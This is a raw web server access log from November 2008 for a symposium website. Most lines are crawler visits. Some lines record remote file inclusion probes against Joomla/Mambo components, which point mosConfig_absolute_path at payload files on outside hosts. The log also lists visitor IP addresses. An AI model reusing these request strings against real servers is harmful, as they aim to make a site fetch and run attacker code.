80.68.200.213 - - [11/Nov/2008:13:30:11 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
80.68.200.213 - - [11/Nov/2008:13:30:11 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
38.99.13.124 - - [11/Nov/2008:15:17:48 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
72.30.78.251 - - [11/Nov/2008:16:22:20 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.78.251 - - [11/Nov/2008:16:22:20 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
217.93.213.116 - - [11/Nov/2008:17:05:08 -0500] "GET http://geil-symposium.com/ HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" 0 www.geil-symposium.com
202.179.180.45 - - [11/Nov/2008:22:27:19 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [11/Nov/2008:22:27:20 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
205.209.170.10 - - [12/Nov/2008:00:03:49 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://majestic12.co.uk/bot.php?I=35468011B8-0000C01A2BA7C16D-geil-symposium_com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
205.209.170.10 - - [12/Nov/2008:00:03:51 -0500] "GET /access.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
205.209.170.10 - - [12/Nov/2008:00:03:53 -0500] "GET /error.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
67.195.37.190 - - [12/Nov/2008:01:59:18 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [12/Nov/2008:01:59:18 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.34 - - [12/Nov/2008:03:11:55 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Qwest 1.0; Qwest 1.0)" 0 www.geil-symposium.com
67.15.60.41 - - [12/Nov/2008:07:01:22 -0500] "GET /logs/access.log HTTP/1.1" 200 302350 "-" "access_log-crawler" 0 www.geil-symposium.com
77.57.203.210 - - [12/Nov/2008:09:19:49 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 0 www.geil-symposium.com
77.57.203.210 - - [12/Nov/2008:09:19:50 -0500] "GET /logs HTTP/1.0" 301 331 "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 0 www.geil-symposium.com
65.55.212.93 - - [12/Nov/2008:11:03:32 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.212.93 - - [12/Nov/2008:11:03:38 -0500] "GET / HTTP/1.0" 200 314 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
208.111.154.16 - - [12/Nov/2008:13:14:00 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [12/Nov/2008:13:14:00 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
65.55.212.93 - - [12/Nov/2008:13:31:23 -0500] "GET /logs HTTP/1.0" 301 331 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.212.93 - - [12/Nov/2008:13:46:57 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 1 www.geil-symposium.com
66.249.71.115 - - [12/Nov/2008:13:48:01 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [12/Nov/2008:13:48:01 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [12/Nov/2008:13:48:02 -0500] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.115 - - [12/Nov/2008:14:02:31 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
202.108.7.214 - - [12/Nov/2008:15:10:07 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
202.108.7.214 - - [12/Nov/2008:15:10:08 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
67.195.37.190 - - [12/Nov/2008:15:40:06 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [12/Nov/2008:15:40:06 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
76.65.77.224 - - [12/Nov/2008:16:51:20 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
76.65.77.224 - - [12/Nov/2008:16:51:23 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
208.80.194.49 - - [12/Nov/2008:17:15:07 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {AF04963B-52A0-8E40-8A88-7DBD5D14F7A6}; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
92.241.182.23 - - [12/Nov/2008:18:07:44 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
92.241.182.23 - - [12/Nov/2008:18:07:45 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
92.241.182.23 - - [12/Nov/2008:18:07:45 -0500] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
92.241.182.23 - - [12/Nov/2008:18:07:45 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
92.241.182.23 - - [12/Nov/2008:18:07:45 -0500] "GET /error.log HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
92.241.182.23 - - [12/Nov/2008:18:07:45 -0500] "GET /access.log HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
74.6.22.173 - - [12/Nov/2008:20:10:34 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.173 - - [12/Nov/2008:20:10:37 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [12/Nov/2008:23:07:26 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [12/Nov/2008:23:07:26 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.17.181 - - [13/Nov/2008:01:03:21 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.181 - - [13/Nov/2008:01:03:21 -0500] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.181 - - [13/Nov/2008:01:03:21 -0500] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.43.140.201 - - [13/Nov/2008:04:10:07 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
74.6.17.181 - - [13/Nov/2008:04:38:52 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.181 - - [13/Nov/2008:04:38:53 -0500] "GET /logs/error.log HTTP/1.0" 200 182237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
218.234.21.14 - - [13/Nov/2008:05:49:51 -0500] "GET /logs/error.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
218.234.21.14 - - [13/Nov/2008:05:49:51 -0500] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
218.234.21.14 - - [13/Nov/2008:05:49:52 -0500] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
85.17.92.36 - - [13/Nov/2008:07:45:41 -0500] "GET / HTTP/1.1" 200 326 "http://www.newstin.com/add-source.a?webmasterpage" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
67.195.37.190 - - [13/Nov/2008:07:53:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [13/Nov/2008:07:53:56 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [13/Nov/2008:07:54:06 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.61.230 - - [13/Nov/2008:07:58:05 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "-" 0 www.geil-symposium.com
220.181.61.230 - - [13/Nov/2008:07:58:15 -0500] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
202.179.180.53 - - [13/Nov/2008:08:19:03 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.53 - - [13/Nov/2008:08:19:12 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.53 - - [13/Nov/2008:08:19:13 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
67.15.60.41 - - [13/Nov/2008:09:16:03 -0500] "GET /logs/access.log HTTP/1.1" 200 311204 "-" "access_log-crawler" 0 www.geil-symposium.com
74.6.18.250 - - [13/Nov/2008:09:37:08 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.250 - - [13/Nov/2008:09:37:10 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.250 - - [13/Nov/2008:09:37:10 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.250 - - [13/Nov/2008:09:49:00 -0500] "GET /logs/access.log HTTP/1.0" 200 311914 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.33 - - [13/Nov/2008:11:00:23 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.8.6)" 0 www.geil-symposium.com
67.43.140.201 - - [13/Nov/2008:11:35:41 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]" 0 www.geil-symposium.com
124.115.0.102 - - [13/Nov/2008:12:28:54 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
66.235.124.38 - - [13/Nov/2008:12:32:41 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [13/Nov/2008:12:32:41 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
199.243.98.58 - - [13/Nov/2008:13:52:05 -0500] "GET /logs/access.log HTTP/1.1" 200 313059 "-" "vtep bigk1pesbdak tbmdmslQkluyut" 2 www.geil-symposium.com
88.66.127.8 - - [13/Nov/2008:14:04:50 -0500] "GET / HTTP/1.1" 200 326 "http://www.google.com/search?hl=de&rls=com.microsoft%3Ade%3AIE-SearchBox&rlz=1I7SKPB_de&q=index+of+geil&lr=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
88.66.127.8 - - [13/Nov/2008:14:04:51 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
65.55.212.93 - - [13/Nov/2008:14:44:21 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.212.93 - - [13/Nov/2008:14:44:21 -0500] "GET /logs/error.log HTTP/1.0" 200 185518 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.212.93 - - [13/Nov/2008:15:44:32 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.212.93 - - [13/Nov/2008:15:44:33 -0500] "GET /logs/access.log HTTP/1.0" 200 314168 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
81.138.0.161 - - [13/Nov/2008:18:48:51 -0500] "GET /logs/access.log HTTP/1.1" 200 314341 "-" "Tbvan sxouojlxnvTqfiigcgjbar" 3 www.geil-symposium.com
202.125.38.99 - - [13/Nov/2008:18:57:58 -0500] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" 0 www.geil-symposium.com
202.125.38.99 - - [13/Nov/2008:18:57:58 -0500] "GET /logs/error.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" 0 www.geil-symposium.com
202.125.38.99 - - [13/Nov/2008:18:57:58 -0500] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" 0 www.geil-symposium.com
203.152.222.4 - - [13/Nov/2008:19:27:58 -0500] "GET /logs/error.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
203.152.222.4 - - [13/Nov/2008:19:27:59 -0500] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
203.152.222.4 - - [13/Nov/2008:19:28:00 -0500] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
67.68.234.98 - - [14/Nov/2008:00:45:59 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
67.68.234.98 - - [14/Nov/2008:00:46:00 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
38.99.13.124 - - [14/Nov/2008:01:12:39 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.33 - - [14/Nov/2008:01:14:03 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)" 0 www.geil-symposium.com
66.249.71.117 - - [14/Nov/2008:07:54:26 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.116 - - [14/Nov/2008:07:54:26 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
124.115.4.203 - - [14/Nov/2008:08:34:27 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.4.203 - - [14/Nov/2008:08:34:28 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
61.247.215.253 - - [14/Nov/2008:11:16:44 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
61.247.215.253 - - [14/Nov/2008:11:16:44 -0500] "GET / HTTP/1.1" 200 326 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
202.179.180.45 - - [14/Nov/2008:11:31:00 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [14/Nov/2008:11:31:01 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
131.107.151.157 - - [14/Nov/2008:12:51:25 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
193.47.80.36 - - [14/Nov/2008:14:50:27 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [14/Nov/2008:14:50:27 -0500] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
67.15.60.41 - - [14/Nov/2008:14:56:09 -0500] "GET /logs/access.log HTTP/1.1" 200 319171 "-" "access_log-crawler" 1 www.geil-symposium.com
74.14.58.48 - - [14/Nov/2008:15:24:21 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]" 0 www.geil-symposium.com
208.80.194.46 - - [14/Nov/2008:17:43:21 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; SpamBlockerUtility 4.8.0; ZangoToolbar 4.8.3; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
65.93.98.81 - - [14/Nov/2008:18:21:14 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]" 0 www.geil-symposium.com
208.111.154.16 - - [14/Nov/2008:18:35:20 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [14/Nov/2008:18:35:20 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
202.160.179.133 - - [14/Nov/2008:20:38:15 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [14/Nov/2008:20:38:17 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
208.80.194.27 - - [15/Nov/2008:02:51:42 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {A5BD9514-83C3-4AC5-9CD8-25D10BF69CB7}; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
198.87.2.45 - - [15/Nov/2008:02:56:27 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
198.87.2.45 - - [15/Nov/2008:02:56:27 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
198.87.2.45 - - [15/Nov/2008:02:56:27 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
208.111.154.16 - - [15/Nov/2008:03:14:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [15/Nov/2008:03:14:56 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [15/Nov/2008:05:00:09 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [15/Nov/2008:05:00:09 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [15/Nov/2008:07:56:02 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [15/Nov/2008:07:56:02 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.30.142.108 - - [15/Nov/2008:11:46:01 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.108 - - [15/Nov/2008:11:46:01 -0500] "GET /logs/error.log HTTP/1.0" 200 190851 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
124.115.0.138 - - [15/Nov/2008:13:16:46 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.138 - - [15/Nov/2008:13:16:50 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
66.249.71.115 - - [15/Nov/2008:13:39:51 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [15/Nov/2008:13:39:51 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
